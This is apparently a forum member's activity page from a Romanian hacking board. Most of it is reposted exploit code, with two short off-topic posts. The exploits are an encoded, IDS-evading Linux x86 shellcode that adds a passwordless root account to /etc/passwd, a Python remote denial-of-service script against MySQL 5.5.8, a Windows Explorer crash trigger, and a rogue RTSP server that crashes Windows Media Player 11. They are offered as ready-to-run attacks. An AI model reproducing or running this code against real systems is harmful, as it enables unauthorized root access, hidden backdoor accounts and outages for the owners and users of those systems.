Jump to content

LLegoLLaS

Active Members
 View Profile  See their activity

  • Posts

    2060

  • Joined

  • Last visited

  • Days Won

    11

 Content Type 

Posts posted by LLegoLLaS

  6. Linux/x86 Polymorphic ShellCode - setuid(0)+setgid(0)+add user 'iph' without password

    in Exploituri

    Posted 

    /*
    # Exploit Title: Linux/x86 Polymorphic ShellCode - setuid(0)+setgid(0)+add user 'iph' without password to /etc/passwd
    # setuid() - setgid() - open() - write() - close() - exit()
    # Date: 30/12/2011
    # Author: pentesters.ir
    # Tested on: Linux x86 - CentOS 6.0 - 2.6.32-71
    # Website: http://pentesters.ir/
    # Contact: Cru3l.b0y@gmail.com
    # By: Cru3l.b0y
    # iph::0:0:IPH:/root:/bin/bash
    # This ShellCode is Anti-IDS
    # Encode: ADD 10

    "\xb0\x17" // mov $0x17,%al
    "\x31\xdb" // xor %ebx,%ebx
    "\xcd\x80" // int $0x80
    "\xb0\x2e" // mov $0x2e,%al
    "\x53" // push %ebx
    "\xcd\x80" // int $0x80
    "\x6a\x05" // push $0x5
    "\x58" // pop %eax
    "\x31\xc9" // xor %ecx,%ecx
    "\x51" // push %ecx
    "\x68\x73\x73\x77\x64" // push $0x64777373
    "\x68\x2f\x2f\x70\x61" // push $0x61702f2f
    "\x68\x2f\x65\x74\x63" // push $0x6374652f
    "\x89\xe3" // mov %esp,%ebx
    "\x66\xb9\x01\x04" // mov $0x401,%cx
    "\xcd\x80" // int $0x80
    "\x89\xc3" // mov %eax,%ebx
    "\x6a\x04" // push $0x4
    "\x58" // pop %eax
    "\x31\xd2" // xor %edx,%edx
    "\x52" // push %edx
    "\x68\x62\x61\x73\x68" // push $0x68736162
    "\x68\x62\x69\x6e\x2f" // push $0x2f6e6962
    "\x68\x6f\x74\x3a\x2f" // push $0x2f3a746f
    "\x68\x3a\x2f\x72\x6f" // push $0x6f722f3a
    "\x68\x3a\x49\x50\x48" // push $0x4850493a
    "\x68\x3a\x30\x3a\x30" // push $0x303a303a
    "\x68\x69\x70\x68\x3a" // push $0x3a687069
    "\x89\xe1" // mov %esp,%ecx
    "\x6a\x1c" // push $0x1c
    "\x5a" // pop %edx
    "\xcd\x80" // int $0x80
    "\x6a\x06" // push $0x6
    "\x58" // pop %eax
    "\xcd\x80" // int $0x80
    "\x6a\x01" // push $0x1
    "\x58" // pop %eax
    "\xcd\x80" // int $0x80
    */

    // ##### ANTI IDS SHELLCODE #####

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    char sc[] =
    "\xeb\x11\x5e\x31\xc9\xb1\x64\x80\x6c\x0e\xff\x0a\x80\xe9"
    "\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\xba\x21\x3b\xe5"
    "\xd7\x8a\xba\x38\x5d\xd7\x8a\x74\x0f\x62\x3b\xd3\x5b\x72"
    "\x7d\x7d\x81\x6e\x72\x39\x39\x7a\x6b\x72\x39\x6f\x7e\x6d"
    "\x93\xed\x70\xc3\x0b\x0e\xd7\x8a\x93\xcd\x74\x0e\x62\x3b"
    "\xdc\x5c\x72\x6c\x6b\x7d\x72\x72\x6c\x73\x78\x39\x72\x79"
    "\x7e\x44\x39\x72\x44\x39\x7c\x79\x72\x44\x53\x5a\x52\x72"
    "\x44\x3a\x44\x3a\x72\x73\x7a\x72\x44\x93\xeb\x74\x26\x64"
    "\xd7\x8a\x74\x10\x62\xd7\x8a\x74\x0b\x62\xd7\x8a";

    int main()
    {
    int (*fp)() = (int(*)())sc;
    printf("bytes: %u\n", strlen(sc));
    fp();
    }
    Copyright 2012 - BugSearch
    About Us - Tell a Friend - Send

    sursa

  8. Intrebari ciudate - Interviews

    in Off-topic

    Posted · Edited by LLegoLLaS

    #Becuri: depinde de suprafata pe care cad

    #Cea cu ancora: mai complicata decat pare.Daca ai o bila de metal (ancora) si o scufunzi intr-o cana (bazin) nivelul lichidului din cana va creste cu x milimetri.Daca insa pui bila pe o minge de ping-pong taiata nivelul apei va creste mai mult. Raspunsul la intrebvare este: nivelul apei scade

    #Buruieni: ai n buruieni.

    n-2 =trandafiri (1)

    (n-2)-2 =margarete (2)

    [(n-2)-2]-2=lalele. (3)

    (1)(2)(3) => ai cel putin 6 flori (pt pesimisti) sau cel putin 7 (pt optimisti)

    #Nemtii is cei mai inalti:Consult statisticile?:))

    @cris2decoder da

  10. hack dmg metin

    in Cosul de gunoi

    Posted

    Daca am mai vazut asa ceva sigur a fost cu multe milioane de ani in urma,reconstituit pe calculator si difuzat pe discovery,la o ora tarzie.

    "Tulai doamni si traznesti"

    LE: toata lumea face petitii pentru orice.Nu se poate face una sa se desfiinteze dracu jocu ala?Dispus sa donez pentru asta

  12. MySQL 5.5.8 Remote Denial Of Service (DOS)

    in Exploituri

    Posted 

    import socket, sys

    print "\n"
    print "----------------------------------------------------------------"
    print "| MySQL 5.5.8 Null Ptr (windows) |"
    print "| Level Smash the Stack |"
    print "----------------------------------------------------------------"
    print "\n"

    buf=("&\x00\x00\x01\x85\xa2\x03\x00\x00\x00\x00@\x93\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00root\x00\x00")

    buf2=("\x11\x00\x00\x00\x03set autocommit30")

    def usage():
    print "usage : ./mysql.py <victim_ip>"
    print "example: ./mysql.py 192.168.1.22"


    def main():
    if len(sys.argv) != 2:
    usage()
    sys.exit()
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    HOST = sys.argv[1]
    PORT = int(3306)
    s.connect((HOST,PORT))
    print "[*] Connect"
    s.send(buf)
    print "[*] Payload 1 sent"
    s.send(buf2)
    print "[*] Payload 2 sent\n", "[*] Run again to ensure it is down..\n"
    s.close()

    if __name__ == "__main__":
    main()

    sursa

  13. Windows Explorer Denial Of Service (DOS)

    in Exploituri

    Posted 


    # Windows 2008 SP2 RC2 Explorer Go Byebye 
    # Windows 7 Pro SP1 Explorer Go Byebye 
    # Interesting
    # Brought to you by Level & z0r0 @ Smash The Stack

    from win32com.shell import shell, shellcon
    from os import mkdir

    try:
    mkdir("c:\\trigger_alt")
    except:
    print "[!] Trigger Directory Exists"
    try:
    mkdir("c:\\trigger_alt\\....")
    except:
    print "[!] Trigger Sub Directory Exists"

    print "[!] Triggering Issue"

    # This moves the directory containing the sub directory which creates the condition.
    # The issue is in the function that moves the files to the recycle bin
    # Replicate this using the following
    # 1- mkdir c:\trigger_alt
    # 2- cd c:\trigger_alt
    # 3- mkdir ....\
    # 4- My Computer -> c:\trigger_alt
    # 5- Right Click -> Delete

    shell.SHFileOperation((0,shellcon.FO_DELETE,'c:\\trigger_alt',None,shellcon.FOF_ALLOWUNDO|shellcon.FOF_NOCONFIRMATION))
    Copyright 2011 - BugSearch

    sursa

  14. Windows Media Player v11.0.5721.5262 Remote Denial Of Se

    in Exploituri

    Posted 


    import socket, binascii
    print "\n"
    print "----------------------------------------------------------------"
    print "| WMP11 Remote Null Pointer |"
    print "| Level, Smash the Stack |"
    print "| Windows XP SP3 x86, Windows Media Player v11.0.5721.5262 |"
    print "| Windows 7 SP2 x64, Windows Media Player v11.0.5721.5262 |"
    print "----------------------------------------------------------------"
    print "\n"
    print "Attack URL: mms://127.0.0.1/Sample_Broadcast\n\n"
    HOST = "127.0.0.1"
    PORT = 554
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((HOST, PORT))
    s.listen(1)
    buf = [
    ("525453502f312e3020323038204f4b0d0a436f6e74656e742d547970653a206170706c696361746"
    "96f6e2f7364700d0a566172793a204163636570740d0a582d506c61796c6973742d47656e2d49643"
    "a203137360d0a582d42726f6164636173742d49643a20300d0a436f6e74656e742d4c656e6774683"
    "a203837390d0a446174653a2053756e2c203038204d617920323031312031353a32343a333320474"
    "d540d0a435365713a20310d0a5365727665723a20574d5365727665722f392e312e312e333834310"
    "d0a537570706f727465643a20636f6d2e6d6963726f736f66742e776d2e73727670706169722c206"
    "36f6d2e6d6963726f736f66742e776d2e737377697463682c20636f6d2e6d6963726f736f66742e7"
    "76d2e656f736d73672c20636f6d2e6d6963726f736f66742e776d2e6661737463616368652c20636"
    "f6d2e6d6963726f736f66742e776d2e7061636b657470616972737372632c20636f6d2e6d6963726"
    "f736f66742e776d2e7374617274757070726f66696c650d0a4c6173742d4d6f6469666965643a205"
    "361742c2031372046656220323030372031333a31343a303420474d540d0a457461673a202231363"
    "8220d0a43616368652d436f6e74726f6c3a206d61782d6167653d38363339392c20782d776d732d7"
    "3747265616d2d747970653d2262726f6164636173742c20706c61796c697374222c206d7573742d7"
    "26576616c69646174652c20707269766174652c20782d776d732d70726f78792d73706c69740d0a0"
    "d0a763d306f3d2d20323031313035303831343339313330343036203230313130353038313433393"
    "1333034303620494e20495034203132372e302e302e310d0a733d3c4e6f205469746c653e633d494"
    "e2049503420302e302e302e30623d52523a30613d70676d70753a646174613a6170706c696361746"
    "96f6e2f766e642e6d732e776d732d6864722e61736676313b6261736536342c4d4361796459356d7"
    "a78476d3251437141474c4f624e4142414141414141414142674141414145436f6479726a4565707"
    "a78474f35414441444342545a5767414141414141414141414141414141414141414141414141414"
    "1414141414c784141414141414141414141414141414141414141664141414141414141414843677"
    "7676b4141414141764d6e50435141414141433546514141414141414141414141414147416741414"
    "26749414145673741414331413739664c716e504559376a414d414d49464e6c4c674141414141414"
    "141415230744f7275716e504559376d414d414d49464e6c42674141414141416b516663743765707"
    "a78474f35674441444342545a566f414141414141414141414f4562746b35627a78476f2f5143415"
    "83178454b7742582b794256573838527150304167463963524373414141414141414141414177414"
    "1414141414141414151414141414141514145414150414141414141414141416b516663743765707"
    "a78474f35674441444342545a5849414141414141414141514a35702b4531627a78476f2f5143415"
    "83178454b31444e77372b50596338526937494171674330346941414141414141414141414277414"
    "1414149414141414167414141414141595145424145416641414151414141414151415141416f414"
    "143494141434141414141414141455141424141415141417a6e5834653431473052474e676742676"
    "c386d69736959414141414141414141416741424145673741414143414567374141417a4a724a316"
    "a6d62504561625a414b6f41597335734b67414141414141414141434141494141674143414141414"
    "141414141414141414141324a724a316a6d62504561625a414b6f415973357337443441414141414"
    "1414141414141414141414141414141414141414141414148774141414141414141414241513d3d7"
    "43d3020300d0a6d3d617564696f2030205254502f415650203936613d72656c6961626c650d0a0d0"
    "a0d0a")
    ]
    while True:
    conn, addr = s.accept()
    print "-----Request From Client-----\n"
    print conn.recv(1024)
    print "-----Request From Client-----\n"
    print "-----Response From Server-----\n"
    print binascii.unhexlify(buf[0])
    print "-----Response From Server-----\n"
    conn.send(binascii.unhexlify(buf[0]))
    conn.close()
    s.close()

    #CRASH
    #(ae8.5b8): Access violation - code c0000005 (first chance)
    #First chance exceptions are reported before any exception handling.
    #This exception may be expected and handled.
    #eax=00000000 ebx=02ba4df8 ecx=00000000 edx=02b5c688 esi=013acff8 edi=00000000
    #eip=128cd479 esp=02ebfb64 ebp=02ebfeec iopl=0 nv up ei pl zr na pe nc
    #cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
    #*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\wmnetmgr.dll -
    #wmnetmgr!DllUnregisterServer+0x76320:
    #128cd479 8bb914010000 mov edi,dword ptr [ecx+114h] ds:0023:00000114=????????
    #0:021> g
    #(ae8.5b8): Access violation - code c0000005 (!!! second chance !!!)
    #eax=00000000 ebx=02ba4df8 ecx=00000000 edx=02b5c688 esi=013acff8 edi=00000000
    #eip=128cd479 esp=02ebfb64 ebp=02ebfeec iopl=0 nv up ei pl zr na pe nc
    #cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
    #wmnetmgr!DllUnregisterServer+0x76320:
    #128cd479 8bb914010000 mov edi,dword ptr [ecx+114h] ds:0023:00000114=????????

    #PAYLOAD#
    #RTSP/1.0 208 OK
    #Content-Type: application/sdp
    #Vary: Accept
    #X-Playlist-Gen-Id: 176
    #X-Broadcast-Id: 0
    #Content-Length: 879
    #Date: Sun, 08 May 2011 15:24:33 GMT
    #CSeq: 1
    #Server: WMServer/9.1.1.3841
    #Supported: com.microsoft.wm.srvppair, com.microsoft.wm.sswitch, com.microsoft.wm.eosmsg, com.microsoft.wm.fastcache, com.microsoft.wm.packetpairssrc, com.microsoft.wm.startupprofile
    #Last-Modified: Sat, 17 Feb 2007 13:14:04 GMT
    #Etag: "168"
    #Cache-Control: max-age=86399, x-wms-stream-type="broadcast, playlist", must-revalidate, private, x-wms-proxy-split
    #v=0o=- 201105081439130406 201105081439130406 IN IP4 127.0.0.1
    #s=<No Title>c=IN IP4 0.0.0.0b=RR:0a=pgmpu:data:application/vnd.ms.wms-hdr.asfv1;base64,MCaydY5mzxGm2QCqAGLObNABAAAAAAAABgAAAAECodyrjEepzxGO5ADADC
    #BTZWgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALxAAAAAAAAAAAAAAAAAAAAfAAAAAAAAAHCgwgkAAAAAvM
    #nPCQAAAAC5FQAAAAAAAAAAAAAGAgAABgIAAEg7AAC1A79fLqnPEY7jAMAMIFNlLgAAAAAAAAAR0tOruq
    #nPEY7mAMAMIFNlBgAAAAAAkQfct7epzxGO5gDADCBTZVoAAAAAAAAAAOEbtk5bzxGo/QCAX1xEKwBX+y
    #BVW88RqP0AgF9cRCsAAAAAAAAAAAwAAAAAAAAAAQAAAAAAQAEAAPAAAAAAAAAAkQfct7epzxGO5gDADC
    #BTZXIAAAAAAAAAQJ5p+E1bzxGo/QCAX1xEK1DNw7+PYc8Ri7IAqgC04iAAAAAAAAAAABwAAAAIAAAAAg
    #AAAAAAYQEBAEAfAAAQAAAAAQAQAAoAACIAACAAAAAAAAEQABAAAQAAznX4e41G0RGNggBgl8misiYAAA
    #AAAAAAAgABAEg7AAACAEg7AAAzJrJ1jmbPEabZAKoAYs5sKgAAAAAAAAACAAIAAgACAAAAAAAAAAAAAA
    #A2JrJ1jmbPEabZAKoAYs5s7D4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAHwAAAAAAAAABAQ==t=0 0m=audio 0 RTP/AVP 96a=reliable

    sursa

×
×
  • Create New...